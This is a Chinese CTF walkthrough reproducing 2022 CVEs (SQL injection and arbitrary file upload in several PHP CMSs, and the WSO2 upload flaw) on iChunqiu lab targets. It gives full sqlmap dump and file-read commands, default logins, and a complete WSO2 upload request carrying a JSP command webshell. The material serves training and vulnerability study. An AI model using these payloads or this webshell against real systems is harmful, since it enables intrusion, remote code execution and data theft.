目录
先提神
CVE-2022-32991
靶标介绍:
该CMS的welcome.php中存在SQL注入攻击。
复现:
打开靶场地址,三个随便选一个进去,记得抓包
扫描一下数据包,发现存在一个可能存在SQL注入的参数
上sqlmap跑一下
出来了,注入点存在
爆表
qlmap -u 'http://eci-2zee2s16so873tn2r3e6.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --user-agent "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" --cookie="PHPSESSID=2avs4r27l86ngp53mus4plh237" -batch -D ctf --tables
爆字段
sqlmap -u 'http://eci-2zee2s16so873tn2r3e6.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --user-agent "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" --cookie="PHPSESSID=2avs4r27l86ngp53mus4plh237" -batch -D ctf -T flag --columns
爆出flag
sqlmap -u 'http://eci-2zee2s16so873tn2r3e6.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=5b141f1e8399e&n=1&t=10' -p 'eid' --user-agent "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" --cookie="PHPSESSID=2avs4r27l86ngp53mus4plh237" -batch -D ctf -T flag --dump
CVE-2022-30887
靶标介绍:
多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。
复现:
打开靶场,使用账号密码进行登录
默认账号密码mayuri.infospace@gmail.com/mayurik
找到上传图片的地方,上传webshell
使用冰蝎连接
找到flag
CVE-2022-29464(WSO2文件上传漏洞)
靶标介绍:
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
复现:
点击靶场地址,抓包,目标主机发送到fiora进行监测,发现漏洞存在
构造exp数据包,项目地址
https://github.com/hakivvi/CVE-2022-29464
poc
POST /fileupload/toolsAny HTTP/1.1
Host: localhost:9443
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 729
Content-Type: multipart/form-data; boundary=4ef9f369a86bfaadf5ec3177278d49c0
User-Agent: python-requests/2.22.0
--4ef9f369a86bfaadf5ec3177278d49c0
Content-Disposition: form-data; name="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"; filename="../../../../repository/deployment/server/webapps/authenticationendpoint/1.jsp"
<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>
--4ef9f369a86bfaadf5ec3177278d49c0--
返回1.6877661707702727E12为上传成功。
访问 https://localhost:9443/authenticationendpoint/1.jsp 即可执行命令
CVE-2022-28512(Fantastic Blog (CMS) SQL注入)
靶标介绍:
Fantastic Blog (CMS)是一个绝对出色的博客/文章网络内容管理系统。它使您可以轻松地管理您的网站或博客,它为您提供了广泛的功能来定制您的博客以满足您的需求。它具有强大的功能,您无需接触任何代码即可启动并运行您的博客。 该CMS的/single.php路径下,id参数存在一个SQL注入漏洞。
复现:
点击进入靶场,地址后面加这个 /single.php?id=-1,访问这个
上神器,sqlmap
爆库
sqlmap -u 'http://eci-2zeeoly4mjlk1clpsk3p.cloudeci1.ichunqiu.com/single.php?id=-1' --dbs
爆表
sqlmap -u 'http://eci-2zeeoly4mjlk1clpsk3p.cloudeci1.ichunqiu.com/single.php?id=-1' -D ctf --tables
爆字段
sqlmap -u 'http://eci-2zeeoly4mjlk1clpsk3p.cloudeci1.ichunqiu.com/single.php?id=-1' -D ctf -T flag --columns
看内容
sqlmap -u 'http://eci-2zeeoly4mjlk1clpsk3p.cloudeci1.ichunqiu.com/single.php?id=-1' -D ctf -T flag --dump
CVE-2022-28060(Victor CMS v1.0 存在sql注入)
靶标介绍:
Victor CMS v1.0 /includes/login.php 登录框存在基于时间的盲注
复现:
打开靶机地址,可以看到一个登录框,随表输入一个账号密码点击登录,这里记得抓包
数据包保存到kali上sqlmap跑
爆库
sqlmap -r 1.txt -p 'user_name,user_password' --dbs
因为这里是延迟注入,所以很费时间,直接搜索flag
sqlmap -r 1.txt --file-read "/flag" --dbms mysql --batch
要等很久很久,成功后会给出保存到本地的目录
cat 查看一下flag
CVE-2022-28525(ED01CMSv20180505存在任意文件上传漏洞)
靶标介绍:
ED01-CMS v20180505 存在任意文件上传漏洞
复现:
打开靶场地址,是一个登录界面,尝试admin/admin登录成功
这里新建一个用户,上传头像的是个搞个webshell,没有任何验证,直接就可以成功了
冰蝎连接,查看flag